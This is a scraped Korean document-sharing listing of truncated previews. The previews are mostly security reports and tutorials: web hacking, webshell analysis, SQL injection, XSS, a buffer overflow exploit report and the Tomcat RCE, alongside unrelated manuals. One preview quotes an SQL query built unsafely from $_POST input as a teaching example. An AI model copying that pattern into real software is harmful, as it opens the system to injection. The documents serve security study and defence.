redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...
More informationPowerPoint 프레젠테이션
chapter 3. 기본웹해킹 1. 정보수집 해커들이웹사이트를해킹하기위해대상시스템의운영체제나어플리케이션버전등과같은대상시스템의정보를수집하는것을의미한다. -2- 일반적인해킹단계 정보수집 취약점분석 실제공격 사후처리 웹스캔포트스캔 Application 종류, 버전 OS종류, 버전등등 OS종류, 버전취약점 Application 취약점 리모트어택웹, DB, SQL injection,
More informationuntitled
웹쉘의현황및분석 2007. 2. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요 일반적으로웹서비스에는게시판이나자료실과같은파일을첨부하는기능을포함한다. 이때 txt, jpg, doc와같은데이터파일종류이외에악의적으로제작된스크립트파일인웹쉘을업로드하여해킹하는사고가빈번히발생하고있다. 이와같이서버명령을실행할수있는
More informationPowerPoint Template
JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More informationuntitled
Oracle DBMS 로그인의접근제어우회 취약점분석 2006. 2. 9 인터넷침해사고대응지원센터 (KISC) 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 룰명시하여주시기바랍니다. 개요 o 2005년이후 Oracle Critical Patch Update(CPU) 는 Oracle사제품대상으로다수의보안패치및보안패치와관련된일반패치를발표하는주요수단임
More informationPowerPoint Template
설치및실행방법 Jaewoo Shim Jun. 4. 2018 Contents SQL 인젝션이란 WebGoat 설치방법 실습 과제 2 SQL 인젝션이란 데이터베이스와연동된웹서버에입력값을전달시악의적동작을수행하는쿼리문을삽입하여공격을수행 SELECT * FROM users WHERE id= $_POST[ id ] AND pw= $_POST[ pw ] Internet
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More information<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>
기술문서 08. 10. 25. 작성 PHP 기반웹쉘의동작원리와공개웹쉘의기능분석및대응방안 작성자 : 동명대학교 THINK 정정홍 (zeratul621@naver.com) 1. 시작하면서 p. 2 2. 웹쉘의동작원리 p. 3 3. r57shell p. 5 4. kcwebtelnet p. 9 5. phpremoteview p. 10 6. 웹쉘대응방안 p. 12 동명대학교정보보호동아리
More informationvar answer = confirm(" 확인이나취소를누르세요."); // 확인창은사용자의의사를묻는데사용합니다. if(answer == true){ document.write(" 확인을눌렀습니다."); else { document.write(" 취소를눌렀습니다.");
자바스크립트 (JavaScript) - HTML 은사용자에게인터페이스 (interface) 를제공하는언어 - 자바스크립트는서버로데이터를전송하지않고서할수있는데이터처리를수행한다. - 자바스크립트는 HTML 나 JSP 에서작성할수있고 ( 내부스크립트 ), 별도의파일로도작성이가능하다 ( 외 부스크립트 ). - 내부스크립트 - 외부스크립트
More information<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>
네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More informationResearch & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W
Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments
More informationMicrosoft Word - SKINFOSEC-CHR-026- Mass SQL Injection 탐지 우회분석 보고서.doc
분석보고서 이동현 (dhclub20@naver.com) SK Infosec Co., Inc MSS 사업본부침해대응팀모의해킹파트 Table of Contents 1. 개요... 3 1.1. 배경... 3 1.2. 목적... 3 2. 공격분석... 4 2.1. Cookie Injection... 4 2.2. Cookie Injection의발생원인... 5 2.3.
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationPowerPoint 프레젠테이션
HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More informationWEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진
WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는
More information제목 레이아웃
웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya
More information<4D F736F F F696E74202D E20B3D7C6AEBFF6C5A920C7C1B7CEB1D7B7A1B9D62E >
웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 소켓 (Socket) (1/2) Socket 이란? 서버와클라이언트가서로특정한규약을사용하여데이터를전송하기위한방식 서버와클라이언트는소켓연결을기다렸다가소켓이연결되면서로데이터를전송 현재네트워크상에서의모든통신의근간은 Socket 이라할수있음 Page 2 1 소켓 (Socket) (2/2)
More informationSSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com
SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com Content 1. SSL Strip - SSL? - SSL MITM - SSL Strip 2. SSL Strip 공격 3. 대응방법 Copyright@2012 All Rights Reserved by SemiDntmd 2 1. SSL Strip 1-1
More informationEDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.
More informationNetwork Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University
Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment
More information<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>
개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000
More informationCookie Spoofing.hwp
Cookie Spoofing&Sniffing By Maxoverpro[max]( 장상근) maxoverpro@empal.com http://www.maxoverpro.org 1. 서론 이문서는 Cookie Spoofing 과 Sniffing 에대해정석적인방법을이야기하도록하며또 한어느특정곳의취약점을설명하지않고직접제작한예제를가지고 Cookie Spoofing 과
More informationSBR-100S User Manual
( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S
More information행자부 G4C
인증서발급관리모듈 Ver 1.0 개정이력 버전변경일변경사유변경내용작성자승인 1.0 2012-12-22 제정이경희 Copyright 2006. All rights reserved DreamSecurity. 2 목차 1. 인증시스템 ACTIVEX 설치절차... 4 1.1 설치... 4 2. 인증시스템 ACTIVEX 사용... 7 2.1 인증서발급... 7 2.2
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More informationMicrosoft PowerPoint 웹 연동 기술.pptx
웹프로그래밍및실습 ( g & Practice) 문양세강원대학교 IT 대학컴퓨터과학전공 URL 분석 (1/2) URL (Uniform Resource Locator) 프로토콜, 호스트, 포트, 경로, 비밀번호, User 등의정보를포함 예. http://kim:3759@www.hostname.com:80/doc/index.html URL 을속성별로분리하고자할경우
More information설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래
네이버플래시애플리케이션 XSS 취약점분석보고서 작성일 2013/04/24 작성자 카이스트시스템보안연구실 홍현욱 (karmatia@kaist.ac.kr) 최현우 (zemisolsol@kaist.ac.kr) 김용대 (yongdaek@kaist.ac.kr) 요약 플래시애플리케이션은보고서작성일을기준으로전체웹사이트의 19.5% 가사용하고있으며 [5] 이러한플래시애플리케이션을작동시켜주는플래시플레이어는웹브라우저에기본적으로설치되어있거나웹브라우저에서웹사이트를이용하는사용자들에게자동으로설치하도록유도한다.
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More information제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호
제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법
More informationDBMS & SQL Server Installation Database Laboratory
DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.
More informationJSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른
JSP 의내장객체 response 객체 - response 객체는 JSP 페이지의실행결과를웹프라우저로돌려줄때사용되는객체이다. - 이객체는주로켄텐츠타입이나문자셋등의데이터의부가정보 ( 헤더정보 ) 나쿠키 ( 다음에설명 ) 등을지정할수있다. - 이객체를사용해서출력의방향을다른 URL로바꿀수있다. 예 ) response.sendredirect("http://www.paran.com");
More informationOracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용
Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the
More informationPowerPoint 프레젠테이션
WEB SERVER PORTING 1 Jo, Heeseung 웹서버포팅 HBE-SM5-S4210 를임베디드웹서버로사용할수있도록웹서버를올리는작업 임베디드서버에널리쓰이는웹서버들중 GoAhead 라는웹서버를포팅 CGI 프로그램을이용하여웹에서 HBE-SM5-S4210 의 LED, 7- Segment, TextLCD 를제어실습 2 Goahead webserver 소스를다운받거나제공된
More information<4D F736F F D20BAB8BEC8BCADB9F620BCD2BDBA20BCF6C1A420BBE7BFEBC0DA20B8DEB4BABEF32E646F63>
보안서버 (SSL) 소스수정매뉴얼 ( 사용자매뉴얼 ) 순서 1. 웹페이지수정방법및사례 (2P ~ 2P) 가. 전체페이지암호화하기 (2P ~ 4P) 나. 페이지별암호화하기 (4P ~ 6P) 다. 프레임별암호화하기 (6P ~ 15P) 2. 보안서버적용확인하기 (15P ~ 16P) 본사용자매뉴얼은정보보호진흥원에서보급된보안서버설치가이드를기준으로작성되었습니다. 1 웹페이지수정및적용확인하기
More informationMicrosoft PowerPoint - aj-lecture1.ppt [호환 모드]
인터넷과웹서비스 개발환경구성, JSP 기본구조 인터넷과 WWW(World Wide Web) 인터넷은 TCP/IP 기반의네트워크가전세계적으로확대되어하나로연결된 네트워크의네트워크 WWW(World Wide Web) 는인터넷기반의서비스중하나 이름프로토콜포트기능 WWW http 80 웹서비스 524730-1 2019 년봄학기 3/11/2019 박경신 Email SMTP/POP3/IMAP
More information2009년 상반기 사업계획
웹 (WWW) 쉽게배우는데이터통신과컴퓨터네트워크 학습목표 웹서비스를위한클라이언트 - 서버구조를살펴본다. 웹서비스를지원하는 APM(Apache, PHP, MySQL) 의연동방식을이해한다. HTML 이지원하는기본태그명령어와프레임구조를이해한다. HTTP 의요청 / 응답메시지의구조와동작원리를이해한다. CGI 의원리를이해하고 FORM 태그로사용자입력을처리하는방식을알아본다.
More information5th-KOR-SANGFOR NGAF(CC)
NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는
More informationAhnLab_template
해킹과침해대응 웹해킹과대응 2013. 10. 17 ( 목 ) 안랩 ASEC 대응팀문영조 Contents 01 웹해킹과취약점 02 웹해킹기법에대한이해 03 웹해킹과침해대응 04 결론 01 웹해킹과취약점 개요 01. 웹해킹과취약점 < 출처 - IBM X-Force 2012 Annual Trend & Risk Report> 4 개요 01. 웹해킹과취약점 웹해킹 (Web
More informationuntitled
디렉토리리스팅취약점을이용한게임 DB 서버해킹사고 2006. 8. 3 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요중국발해킹의표적이온라인게임서버에까지이어지고있다. 특히중국에는현재수많은게임작업장이있으며, 이곳에서는많은중국인들이단순히게임을즐기는것이아니라아이템매매로인한금전적인이득을목적으로한범죄행위를하고있다.
More information1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아
LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml
More information[Brochure] KOR_TunA
LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /
More information슬라이드 1
TCPdump 사용법 Neworks, Inc. (Tel) 070-7101-9382 (Fax) 02-2109-6675 ech@pumpkinne.com hp://www.pumpkinne.co.kr TCPDUMP Tcpdump 옵션 ARP 정보 ICMP 정보 ARP + ICMP 정보 IP 대역별정보 Source 및 Desinaion 대역별정보 Syn 과 syn-ack
More information** 5 개이발생한주요소프트웨어별취약점세 EDB 번호취약점종류공격난이도공격위험도취약점이름소프트웨어이름
EDB 분석보고서 (016.01) 016.01.01~016.01.31 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 016 년 1 월에공개된 Exploit-DB 의분석결과, SQL Injection 공격에대한취약점보고개수가가장많았습니다. 분석된 SQL Injection
More informationuntitled
보안서버구축가이드 8 Ⅲ. SSL 방식보안서버구축하기 1. 소개및보안서버구축절차 가. 개요 SSL은 Secure Sockets Layer의머리글이며, 1994년 Netscape에의해전세계적인표준보안기술이개발되었습니다. SSL 방식은웹브라우저와서버간의통신에서정보를암호화함으로써도중에해킹을통해정보가유출되더라도정보의내용을보호할수있는기능을갖춘보안솔루션으로전세계적으로수백만개의웹사이트에서사용하고있습니다.
More information<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F32C2F7BDC32E >
6. ASP.NET ASP.NET 소개 ASP.NET 페이지및응용프로그램구조 Server Controls 데이터베이스와연동 8 장. 데이터베이스응용개발 (Page 20) 6.1 ASP.NET 소개 ASP.NET 동적웹응용프로그램을개발하기위한 MS 의웹기술 현재 ASP.NET 4.5까지출시.Net Framework 4.5 에포함 Visual Studio 2012
More informationMicrosoft PowerPoint - 10Àå.ppt
10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어
More informationBEA_WebLogic.hwp
BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법
More informationvRealize Automation용 VMware Remote Console - VMware
vrealize Automation 용 VMware Remote Console VMware Remote Console 9.0 이문서는새버전으로교체되기전까지나열된각제품버전및모든이후버전을지원합니다. 이문서에대한최신버전을확인하려면 http://www.vmware.com/kr/support/pubs 를참조하십시오. KO-002230-00 vrealize Automation
More information슬라이드 제목 없음
MS SQL Server 마이크로소프트사가윈도우운영체제를기반으로개발한관계 DBMS 모바일장치에서엔터프라이즈데이터시스템에이르는다양한플랫폼에서운영되는통합데이터관리및분석솔루션 2 MS SQL Server 개요 3.1 MS SQL Server 개요 클라이언트-서버모델을기반으로하는관계 DBMS 로서윈도우계열의운영체제에서만동작함 오라클관계 DBMS 보다가격이매우저렴한편이고,
More informationTTA Journal No.157_서체변경.indd
표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH
More information목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응
MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,
More information1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation
1. What is AX1 AX1 Program은 WIZnet 사의 Hardwired TCP/IP Chip인 iinchip 들의성능평가및 Test를위해제작된 Windows 기반의 PC Program이다. AX1은 Internet을통해 iinchip Evaluation Board(EVB B/D) 들과 TCP/IP Protocol로연결되며, 연결된 TCP/IP
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More information쉽게 풀어쓴 C 프로그래밍
CHAPTER 14. HTML5 웹스토리지, 파일 API, 웹소켓 웹스토리지 웹스토리지 (web storage) 는클라이언트컴퓨터에데이터를저장하는메카니즘 웹스토리지는쿠키보다안전하고속도도빠르다. 약 5MB 정도까지저장이가능하다. 데이터는키 / 값 (key/value) 의쌍으로저장 localstorage 와 sessionstorage localstorage 객체
More informationInstall stm32cubemx and st-link utility
STM32CubeMX and ST-LINK Utility for STM32 Development 본문서는 ST Microelectronics 의 ARM Cortex-M 시리즈 Microcontroller 개발을위해제공되는 STM32CubeMX 와 STM32 ST-LINK Utility 프로그램의설치과정을설명합니다. 본문서는 Microsoft Windows 7
More information2장 변수와 프로시저 작성하기
Chapter. RequestDispatcher 활용 요청재지정이란? RequestDispatcher 활용 요청재지정구현예제 Chapter.9 : RequestDispatcher 활용 1. 요청재지정이란? 클라이언트로부터요청받은 Servlet 프로그램이응답을하지않고다른자원에수행흐름을넘겨다른자원의처리결과를대신응답하는것또는다른자원의수행결과를포함하여응답하는것을요청재지정이라고한다.
More informationObservational Determinism for Concurrent Program Security
웹응용프로그램보안취약성 분석기구현 소프트웨어무결점센터 Workshop 2010. 8. 25 한국항공대학교, 안준선 1 소개 관련연구 Outline Input Validation Vulnerability 연구내용 Abstract Domain for Input Validation Implementation of Vulnerability Analyzer 기존연구
More information목차 윈도우드라이버 1. 매뉴얼안내 운영체제 (OS) 환경 윈도우드라이버준비 윈도우드라이버설치 Windows XP/Server 2003 에서설치 Serial 또는 Parallel 포트의경우.
소프트웨어매뉴얼 윈도우드라이버 Rev. 3.03 SLP-TX220 / TX223 SLP-TX420 / TX423 SLP-TX400 / TX403 SLP-DX220 / DX223 SLP-DX420 / DX423 SLP-DL410 / DL413 SLP-T400 / T403 SLP-T400R / T403R SLP-D220 / D223 SLP-D420 / D423
More informationSQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자
SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전
More information슬라이드 1
Tadpole for DB 1. 도구개요 2. 설치및실행 4. 활용예제 1. 도구개요 도구명 소개 Tadpole for DB Tools (sites.google.com/site/tadpolefordb/) 웹기반의데이터베이스를관리하는도구 Database 스키마및데이터관리 라이선스 LGPL (Lesser General Public License) 특징 주요기능
More informationMicrosoft Word - CrossSiteScripting[XSS].docx
1 Education Giehong.E goodbyestar@nate.com abstract - 영리를목적으로한곳에서의불법적인배포는금지합니다. - 문서의내용은임의의가상테스트를대상으로한 OWASP10 의기본적인내용들이며교육을위해만들어진문서입니다. - 비인가받은악의적인행동은불법이며법적책임또한당사자에게있습니다 Copyright@2008 All Rights Reserved
More information< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10
